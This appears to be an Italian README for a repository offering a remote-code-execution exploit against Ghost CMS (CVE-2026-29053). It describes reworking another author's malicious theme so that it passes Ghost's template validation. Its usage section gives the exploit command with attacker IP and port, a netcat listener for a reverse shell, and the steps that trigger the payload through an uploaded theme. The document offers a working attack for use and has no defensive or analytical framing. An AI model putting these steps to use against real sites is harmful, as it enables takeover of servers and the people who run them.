
Vulnerabilità (RCE) scoperta in Ghost CMS (che colpisce in particolare le versioni dalla 0.7.2 alla 6.19.0)
Questa è una rielaborazione della repository di rootxran per questa stessa CVE - https://github.com/rootxran/CVE-2026-29053
Durante i test su specifici ambienti Ghost CMS, il payload del tema originale ha generato un Fatal Handlebars Error. Il CMS non è riuscito ad attivare il tema dannoso perché faceva riferimento a un helper deprecato o mancante (social_url) all'interno del file author.hbs.
Ho aggiornato i template Handlebars per utilizzare helper nativi e compatibili. Questo garantisce che il tema superi i controlli di validazione interni di Ghost, consentendo allo exploit di attivarsi correttamente senza essere bloccato dal parser di sicurezza del motore dei temi.
Utilizzo: (fare riferimento allo exploit originale per la guida video).
┌──(root㉿user)-[/tmp/CVE-2026-29053]
└─# python3 exploit.py -i 10.10.15.93 -p 4444
[+] Payload: 10.10.15.93:4444
[+] Created: /tmp/CVE-2026-29053/malicious-theme.zip
1. nc -lvnp 4444
2. Upload theme, create page with slug 'rce'
3. Visit /rce/